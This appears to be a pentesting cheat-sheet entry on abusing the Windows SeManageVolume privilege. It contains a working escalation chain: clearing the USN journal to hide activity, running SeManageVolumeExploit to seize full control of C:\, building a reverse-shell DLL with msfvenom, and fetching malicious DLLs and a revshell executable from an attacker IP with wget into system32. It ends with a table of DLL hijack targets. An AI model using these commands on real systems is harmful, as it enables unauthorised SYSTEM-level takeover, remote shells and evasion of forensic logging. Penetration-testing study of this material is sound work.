SeManageVolume

The SeManageVolume privilege (aka Manage Volume) allows direct control over NTFS volumes, including the ability to clear the Update Sequence Number (USN) change journal, which logs every file and directory modification on a volume for forensic and backup purposes. Clearing the journal erases this history, making post-exploitation activity harder to detect.

Beyond this, the privilege can be actively exploited to gain write access to the entire volume. Tools such as SeManageVolumeExploit can leverage the privilege to modify permissions across C:\, effectively granting full control over all files and directories.

# Check permissions
> whoami /priv
​
Privilege Name                Description                      State
============================= ================================ ========
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled

# Run the exploit
> .\SeManageVolumeExploit.exe

# Check volume permissions
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(F) # Full Access

A SYSTEM level shell can be gain via DLL hijacking. For example, the tzres.dll can be used to perform a DLL hijack on systeminfo.

# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dll

Dropping the malicious DLL to C:\Windows\system32\wbem\tzres.dll and running systeminfo will load the DLL, executing code as NT AUTHORITY\NETWORK SERVICE.

> wget 192.168.45.241:443/tzres.dll -O c:\windows\system32\wbem\tzres.dll
> systeminfo

The phoneinfo.dll can be also leveraged as shown here:

> wget 192.168.45.241:443/phoneinfo.dll -O c:\windows\system32\phoneinfo.dll
> wget 192.168.45.241:443/Report.wer -O Report.wer
> wget 192.168.45.241:443/WerTrigger.exe -O WerTrigger.exe
> wget 192.168.45.241:443/revshell.exe -O revshell.exe
> .\WerTrigger.exe
c:\users\public\revshell.exe

Other high-value DLL hijack targets for common Windows binaries:

Binary	DLL(s) to Hijack	Drop Location
systeminfo.exe	tzres.dll, wbemcomn.dll	C:\Windows\System32\wbem\
taskmgr.exe	UIAutomationCore.dll	C:\Windows\System32\
eventvwr.exe	mmc.dll, wevtapi.dll	C:\Windows\System32\
notepad.exe	dbghelp.dll, msvcrt.dll	C:\Windows\System32\
perfmon.exe	perfts.dll, perfc009.dll	C:\Windows\System32\
wmic.exe	fastprox.dll, wbemcomn.dll, wmiprvsd.dll	C:\Windows\System32\wbem\
winmgmt.exe	fastprox.dll, wbemcomn.dll	C:\Windows\System32\wbem\
mstsc.exe	rdpencom.dll, tsres.dll	C:\Windows\System32\